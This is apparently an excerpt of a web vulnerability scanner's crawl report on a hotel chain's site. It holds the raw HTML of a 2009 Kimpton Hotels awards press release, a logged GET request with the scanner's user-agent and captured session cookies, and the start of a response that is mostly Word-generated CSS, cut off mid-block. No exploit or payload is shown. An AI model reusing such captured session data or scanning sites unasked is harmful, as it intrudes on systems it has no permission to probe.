mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Times; panose-1:2 0 5 0 0 0 0 0 0 0; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Wingdings; panose-1:5 2 1 2 1 8 4 8 7 8; mso-font-charset:2; mso-generic-font-family:auto; mso-font-format:other; mso-font-pitch:variable; mso-font-signature:0 0 65536 0 128 0;}@font-face {font-family:Tahoma; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Arial Unicode MS"; mso-font-charset:128; mso-generic-font-family:swiss; mso-font-pitch:variable; mso-font-signature:-1 -23 1056964608 0 -16695552 0;} /* Style Definitions */p.MsoNormal, li.MsoNormal, div.MsoNormal {mso-style-parent:""; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:12.0pt; font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman";}h1 {mso-margin-top-alt:auto; margin-right:0in; mso-margin-bottom-alt:auto; margin-left:0in; mso-pagination:widow-orphan; mso-outline-level:1; font-size:24.0pt; mso-bidi-font-size:10.0pt; font-family:"Times New Roman"; mso-ascii-font-family:"Arial Unicode MS"; mso-fareast-font-family:"Arial Unicode MS"; mso-hansi-font-family:"Arial Unicode MS";}p.MsoCommentText, li.MsoCommentText, div.MsoCommentText {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman";}p.MsoHeader, li.MsoHeader, div.MsoHeader {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.0in right 6.0in; font-size:12.0pt; font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman";}p.MsoFooter, li.MsoFooter, div.MsoFooter {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.0in right 6.0in; font-size:12.0pt; font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman";}span.MsoCommentReference {mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt;}p.MsoBodyText2, li.MsoBodyText2, div.MsoBodyText2 {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; mso-bidi-font-size:12.0pt; font-family:Arial; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:Arial;}a:link, span.MsoHyperlink {color:blue; text-decoration:underline; text-underline:single;}a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline; text-underline:single;}strong {mso-bidi-font-weight:bold;}p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject {mso-style-noshow:yes; mso-style-parent:"Comment Text"; mso-style-next:"Comment Text"; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman"; font-weight:bold;}p.MsoAcetate, li.MsoAcetate, div.MsoAcetate {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Tahoma; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:Tahoma;} /* Page Definitions */@page {mso-footnote-separator:url(":images:header.htm") fs; mso-footnote-continuation-separator:url(":images:header.htm") fcs; mso-endnote-separator:url(":images:header.htm") es; mso-endnote-continuation-separator:url(":images:header.htm") ecs;}@page Section1 {size:8.5in 11.0in; margin:1.0in 1.0in 1.0in 1.0in; mso-header-margin:.5in; mso-footer-margin:.5in; mso-title-page:yes; mso-footer:url(":images:header.htm") f1; mso-paper-source:0;}div.Section1 {page:Section1;} /* List Definitions */@list l0 {mso-list-id:1932929043; mso-list-type:hybrid; mso-list-template-ids:340533954 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l0:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}ol {margin-bottom:0in;}ul {margin-bottom:0in;}--></style><!--[if gte mso 10]><style> /* Style Definitions */table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin:0in; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman";}</style><![endif]--><!--[if gte mso 9]><xml> <o:shapedefaults v:ext="edit" spidmax="2050"/></xml><![endif]--><!--[if gte mso 9]><xml> <o:shapelayout v:ext="edit"> <o:idmap v:ext="edit" data="1"/> </o:shapelayout></xml><![endif]--></head><body lang=EN-US link=blue vlink=purple style='tab-interval:.5in'><div class=Section1><p class=MsoNormal><span style='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f"> <v:stroke joinstyle="miter"/> <v:formulas> <v:f eqn="if lineDrawn pixelLineWidth 0"/> <v:f eqn="sum @0 1 0"/> <v:f eqn="sum 0 0 @1"/> <v:f eqn="prod @2 1 2"/> <v:f eqn="prod @3 21600 pixelWidth"/> <v:f eqn="prod @3 21600 pixelHeight"/> <v:f eqn="sum @0 0 1"/> <v:f eqn="prod @6 1 2"/> <v:f eqn="prod @7 21600 pixelWidth"/> <v:f eqn="sum @8 21600 0"/> <v:f eqn="prod @7 21600 pixelHeight"/> <v:f eqn="sum @10 21600 0"/> </v:formulas> <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/> <o:lock v:ext="edit" aspectratio="t"/></v:shapetype><v:shape id="_x0000_i1025" type="#_x0000_t75" style='width:152pt; height:43pt'> <v:imagedata src="images/image001.jpg" o:title="Kimpton New Logo"/></v:shape><![endif]--><![if !vml]><img width=154 height=45src="images/image002.gif" v:shapes="_x0000_i1025"><![endif]></span><spanstyle='font-size:11.0pt;font-family:Arial;mso-fareast-font-family:Times;mso-bidi-font-family:Arial'><span style='mso-tab-count:2'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span></span></p><p class=MsoNormal><o:p>&nbsp;</o:p></p><p class=MsoNormal><b><span style='font-size:16.0pt;font-family:Arial;mso-bidi-font-family:Arial'>FOR IMMEDIATE RELEASE<o:p></o:p></span></b></p><p class=MsoNormal><b><span style='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></b></p><p class=MsoNormal><i style='mso-bidi-font-style:normal'><spanstyle='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial'>Media Contacts:</span></i><i style='mso-bidi-font-style:normal'><spanstyle='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial'><o:p></o:p></span></i></p><p class=MsoNormal><b><span style='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>Baltz&amp; Company for Kimpton<o:p></o:p></span></b></p><p class=MsoNormal><span style='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>ChloeMata Crane / 212-982-8300 x104 / <a href="mailto:cmcrane@baltzco.com">cmcrane@baltzco.com</a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<o:p></o:p></span></p><p class=MsoNormal><span style='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>MarlieseEngel Traver / 212-982-8300 x112 / <a href="mailto:mtraver@baltzco.com">mtraver@baltzco.com</a><b><o:p></o:p></b></span></p><p class=MsoNormal><b><span style='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'><o:p>&nbsp;</o:p></span></b></p><p class=MsoNormal><b><span style='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>KimptonHotels &amp; Restaurants<o:p></o:p></span></b></p><p class=MsoNormal><span style='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>StaceyEllis / 415-955-5492 / </span><a href="mailto:stacey.ellis@kimptongroup.com"><spanstyle='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>stacey.ellis@kimptongroup.com</span></a><spanstyle='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'><o:p></o:p></span></p><p class=MsoNormal><span style='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>JamieLaw / 415-955-5495 / </span><a href="mailto:jamie.law@kimptongroup.com"><spanstyle='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>jamie.law@kimptongroup.com</span></a><spanstyle='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'><o:p></o:p></span></p><p class=MsoNormal><span style='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal><span style='font-size:10.0pt;mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal align=center style='text-align:center'><b style='mso-bidi-font-weight:normal'><span style='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>KIMPTON HOTELS GARNER 2009 READERS� CHOICEAWARDS <o:p></o:p></span></b></p><p class=MsoNormal align=center style='text-align:center'><b style='mso-bidi-font-weight:normal'><span style='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>IN <i>CON<span style='text-transform:uppercase'>d�Nast Traveler</span> </i>MAGAZINE<o:p></o:p></span></b></p><p class=MsoNormal align=center style='text-align:center;line-height:150%'><spanstyle='font-size:11.0pt;line-height:150%;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal style='line-height:150%'><span style='font-size:11.0pt;line-height:150%;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>SAN FRANCISCO, Calif., November 30, 2009 </span><span style='font-size:11.0pt;line-height:150%;font-family:Arial;mso-bidi-font-family:Arial'>&#8211; <ahref="http://kimptonhotels.com/">Kimpton Hotels &amp; Restaurants</a>, acollection of boutique hotels and chef-driven restaurants, garnered two <bstyle='mso-bidi-font-weight:normal'>2009 Readers� Choice Awards<istyle='mso-bidi-font-style:normal'> </i></b>in the November 2009 issue of <istyle='mso-bidi-font-style:normal'>Cond� Nast Traveler </i>magazine.<spanstyle="mso-spacerun: yes">&nbsp; </span>Kimpton�s <ahref="http://www.burnhamhotel.com/">Hotel Burnham</a> in Chicago and <ahref="http://www.ninezero.com/">Nine Zero Hotel</a> in Boston were named amongthe �Best in the World� and featured in the �Top 100 United States Hotels�list.<span style="mso-spacerun: yes">&nbsp; </span>Scores were determined by asurvey of 25,008 travelers who called out both Kimpton hotels by awarding themthe following scores: <br style='mso-special-character:line-break'><![if !supportLineBreakNewLine]><br style='mso-special-character:line-break'><![endif]><o:p></o:p></span></p><ul style='margin-top:0in' type=disc> <li class=MsoNormal style='mso-list:l0 level1 lfo1;tab-stops:list .5in'><b style='mso-bidi-font-weight:normal'><span style='font-size:11.0pt; font-family:Arial;mso-bidi-font-family:Arial'>Kimpton�s Hotel Burnham </span></b><span style='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial'>(Chicago, IL): 86.1 percent <b style='mso-bidi-font-weight:normal'><o:p></o:p></b></span></li> <li class=MsoNormal style='mso-list:l0 level1 lfo1;tab-stops:list .5in'><b style='mso-bidi-font-weight:normal'><span style='font-size:11.0pt; font-family:Arial;mso-bidi-font-family:Arial'>Kimpton�s Nine Zero Hotel </span></b><span style='font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial'>(Boston, MA): 84.7 percent <b style='mso-bidi-font-weight:normal'><o:p></o:p></b></span></li></ul><p class=MsoNormal style='line-height:150%'><b style='mso-bidi-font-weight:normal'><span style='font-size:11.0pt;line-height:150%;font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></b></p><p class=MsoNormal style='line-height:150%'><span style='font-size:11.0pt;line-height:150%;font-family:Arial;mso-bidi-font-family:Arial'>�Praise from ourguests is the highest honor we can receive,� said Niki Leondakis, chiefoperating officer, Kimpton Hotels &amp; Restaurants.<span style="mso-spacerun:yes">&nbsp; </span>�This honor is a testament to the dedication our employeeshave for creating positive and memorable travel experiences for our guests.�<o:p></o:p></span></p><p class=MsoNormal style='line-height:150%'><span style='f..
- /pdfs/press/html/Green-Seal-0310/

/pdfs/press/html/Green-Seal-0310/

http://www.kimptonhotels.com/pdfs/press/html/Green-Seal-0310/

Request

GET /pdfs/press/html/Green-Seal-0310/ HTTP/1.1
Referer: http://www.kimptonhotels.com/pdfs/press/html/Green-Seal-0310/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:10:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 36382
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:w="urn:schemas-microsoft-com:office:word"
xmlns:dt="uuid:C2F41010-65B3-11d1-A29F-00AA00C14882"
xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40">

<head>
<meta name=Title content=" ">
<meta name=Keywords content="">
<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 2008">
<meta name=Originator content="Microsoft Word 2008">
<link rel=File-List href="images/filelist.xml">
<link rel=Edit-Time-Data href="images/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
o\:* {behavior:url(#default#VML);}
w\:* {behavior:url(#default#VML);}
.shape {behavior:url(#default#VML);}
</style>
<![endif]-->
<title> </title>
<!--[if gte mso 9]><xml>
<o:DocumentProperties>
<o:Author>Marliese Engel</o:Author>
<o:Template>Normal.dotm</o:Template>
<o:LastAuthor>Marie Chen</o:LastAuthor>
<o:Revision>2</o:Revision>
<o:TotalTime>2</o:TotalTime>
<o:LastPrinted>2010-04-28T18:21:00Z</o:LastPrinted>
<o:Created>2010-04-28T18:21:00Z</o:Created>
<o:LastSaved>2010-04-28T18:21:00Z</o:LastSaved>
<o:Pages>1</o:Pages>
<o:Words>1283</o:Words>
<o:Characters>7314</o:Characters>
<o:Company>Baltz &amp; Company</o:Company>
<o:Lines>60</o:Lines>
<o:Paragraphs>14</o:Paragraphs>
<o:CharactersWithSpaces>8982</o:CharactersWithSpaces>
<o:Version>12.0</o:Version>
</o:DocumentProperties>
<o:CustomDocumentProperties>
<o:_NewReviewCycle dt:dt="string"></o:_NewReviewCycle>
</o:CustomDocumentProperties>
<o:OfficeDocumentSettings>
<o:PixelsPerInch>96</o:PixelsPerInch>
<o:TargetScreenSize>800x600</o:TargetScreenSize>
</o:OfficeDocumentSettings>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:UseNormalStyleForList/>
<w:DontUseIndentAsNumberingTabStop/>
<w:DontGrowAutofit/>
<w:FELineBreak11/>
<w:WW11IndentRules/>
<w:DontAutofitConstrainedTables/>
<w:AutofitLikeWW11/>
<w:HangulWidthLikeWW11/>
</w:Compatibility>
</w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" LatentStyleCount="276">
</w:LatentStyles>
</xml><![endif]-->
<style>
<!--
/* Font Definitions */
@font-face
{font-family:Arial;
panose-1:2 11 6 4 2 2 2 2 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:"Courier New";
panose-1:2 7 3 9 2 2 5 2 4 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Times;
panose-1:2 0 5 0 0 0 0 0 0 0;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Wingdings;
panose-1:5 2 1 2 1 8 4 8 7 8;
mso-font-charset:2;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:0 0 65536 0 128 0;}
@font-face
{font-family:Calibri;
panose-1:2 15 5 2 2 2 4 3 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Tahoma;
panose-1:2 11 6 4 3 5 4 4 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:"Arial Unicode MS";
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:50331648 0 0 0 16777216 0;}
@font-face
{font-family:Consolas;
panose-1:2 11 6 9 2 2 4 3 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{mso-style-parent:"";
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Times New Roman";
mso-ascii-font-family:Calibri;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Calibri;
mso-bidi-font-family:"Times New Roman";}
h1
{mso-style-link:"Heading 1 Char";
mso-margin-top-alt:auto;
margin-right:0in;
mso-margin-bottom-alt:auto;
margin-left:0in;
mso-pagination:widow-orphan;
mso-outline-level:1;
font-size:24.0pt;
mso-bidi-font-size:10.0pt;
font-family:"Times New Roman";
mso-ascii-font-family:"Arial Unicode MS";
mso-fareast-font-family:"Arial Unicode MS";
mso-hansi-font-family:"Arial Unicode MS";}
p.MsoCommentText, li.MsoCommentText, div.MsoCommentText
{mso-style-noshow:yes;
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Times New Roman";
mso-ascii-font-family:Calibri;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Calibri;
mso-bidi-font-family:"Times New Roman";}
p.MsoHeader, li.MsoHeader, div.MsoHeader
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
tab-stops:center 3.0in right 6.0in;
font-size:11.0pt;
font-family:"Times New Roman";
mso-ascii-font-family:Calibri;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Calibri;
mso-bidi-font-family:"Times New Roman";}
p.MsoFooter, li.MsoFooter, div.MsoFooter
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
tab-stops:center 3.0in right 6.0in;
font-size:11.0pt;
font-family:"Times New Roman";
mso-ascii-font-family:Calibri;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Calibri;
mso-bidi-font-family:"Times New Roman";}
span.MsoCommentReference
{mso-style-noshow:yes;
mso-ansi-font-size:8.0pt;
mso-bidi-font-size:8.0pt;}
p.MsoBodyText2, li.MsoBodyText2, div.MsoBodyText2
{margin-top:0in;
margin-right:0in;
margin-bottom:6.0pt;
margin-left:0in;
line-height:200%;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
a:link, span.MsoHyperlink
{color:blue;
text-decoration:underline;
text-underline:single;}
a:visited, span.MsoHyperlinkFollowed
{color:purple;
text-decoration:underline;
text-underline:single;}
strong
{mso-bidi-font-weight:bold;}
p.MsoDocumentMap, li.MsoDocumentMap, div.MsoDocumentMap
{mso-style-noshow:yes;
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
background:navy;
font-size:10.0pt;
font-family:Tahoma;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Tahoma;}
p.MsoPlainText, li.MsoPlainText, div.MsoPlainText
{mso-style-noshow:yes;
mso-style-link:"Plain Text Char";
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.5pt;
font-family:"Times New Roman";
mso-ascii-font-family:Consolas;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Consolas;
mso-bidi-font-family:"Times New Roman";}
p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject
{mso-style-noshow:yes;
mso-style-parent:"Comment Text";
mso-style-next:"Comment Text";
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Times New Roman";
mso-ascii-font-family:Calibri;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Calibri;
mso-bidi-font-family:"Times New Roman";
font-weight:bold;}
p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
{mso-style-noshow:yes;
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:8.0pt;
font-family:Tahoma;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Tahoma;}
span.Heading1Char
{mso-style-name:"Heading 1 Char";
mso-style-locked:yes;
mso-style-link:"Heading 1";
mso-ansi-font-size:24.0pt;
font-family:"Arial Unicode MS";
mso-ascii-font-family:"Arial Unicode MS";
mso-fareast-font-family:"Arial Unicode MS";
mso-hansi-font-family:"Arial Unicode MS";
mso-font-kerning:18.0pt;
mso-ansi-language:EN-US;
mso-fareast-language:EN-US;
font-weight:bold;
mso-bidi-font-weight:normal;}
span.PlainTextChar
{mso-style-name:"Plain Text Char";
mso-style-noshow:yes;
mso-style-locked:yes;
mso-style-link:"Plain Text";
mso-ansi-font-size:10.5pt;
mso-bidi-font-size:10.5pt;
font-family:Consolas;
mso-ascii-font-family:Consolas;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Consolas;
mso-ansi-language:EN-US;
mso-fareast-language:EN-US;}
p.CharChar1CharChar, li.CharChar1CharChar, div.CharChar1CharChar
{mso-style-name:" Char Char1 Char Char";
margin-top:0in;
margin-right:0in;
margin-bottom:8.0pt;
margin-left:0in;
text-align:justify;
line-height:12.0pt;
mso-line-height-rule:exactly;
mso-pagination:none;
mso-layout-grid-align:none;
font-size:10.0pt;
font-family:Arial;
mso-ascii-font-family:"Times New Roman";
mso-fareast-font-family:"Times New Roman";
mso-hansi-font-family:"Times New Roman";
mso-bidi-font-family:Arial;
mso-ansi-language:DE-CH;}
/* Page Definitions */
@page
{mso-footnote-separator:url(":images:header.htm") fs;
mso-footnote-continuation-separator:url(":images:header.htm") fcs;
mso-endnote-separator:url(":images:header.htm") es;
mso-endnote-continuation-separator:url(":images:header.htm") ecs;}
@page Section1
{size:8.5in 11.0in;
margin:1.0in 1.0in 1.0in 1.0in;
mso-header-margin:.5in;
mso-footer-margin:.5in;
mso-paper-source:0;}
div.Section1
{page:Section1;}
/* List Definitions */
@list l0
{mso-list-id:700908021;
mso-list-type:hybrid;
mso-list-template-ids:1744995092 197641 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l0:level1
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";
mso-bidi-font-family:Symbol;}
@list l1
{mso-list-id:762846213;
mso-list-type:hybrid;
mso-list-template-ids:737695120 66569 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l1:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l2
{mso-list-id:1241058028;
mso-list-type:hybrid;
mso-list-template-ids:1236678956 66569 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l2:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l3
{mso-list-id:1319529687;
mso-list-type:hybrid;
mso-list-template-ids:2038327704 1253897630 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l3:level1
{mso-level-number-format:bullet;
mso-level-text:\F0FC;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;}
@list l3:level2
{mso-level-tab-stop:1.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l3:level3
{mso-level-tab-stop:1.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l3:level4
{mso-level-tab-stop:2.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l3:level5
{mso-level-tab-stop:2.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l3:level6
{mso-level-tab-stop:3.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l3:level7
{mso-level-tab-stop:3.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l3:level8
{mso-level-tab-stop:4.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l3:level9
{mso-level-tab-stop:4.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l4
{mso-list-id:1597444569;
mso-list-type:hybrid;
mso-list-template-ids:-1248318078 197641 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l4:level1
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";
mso-bidi-font-family:Symbol;}
@list l5
{mso-list-id:1836218086;
mso-list-type:hybrid;
mso-list-template-ids:1327258538 197641 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l5:level1
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";
mso-bidi-font-family:Symbol;}
@list l6
{mso-list-id:1851023485;
mso-list-type:hybrid;
mso-list-template-ids:-1010268010 66569 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l6:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l7
{mso-list-id:2057967201;
mso-list-type:hybrid;
mso-list-template-ids:-2130538154 66569 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l7:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l7:level2
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:1.0in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";
mso-bidi-font-family:Symbol;}
@list l8
{mso-list-id:2140606293;
mso-list-type:hybrid;
mso-list-template-ids:-893243000 197641 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l8:level1
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";
mso-bidi-font-family:Symbol;}
ol
{margin-bottom:0in;}
ul
{margin-bottom:0in;}
-->
</style>
<!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
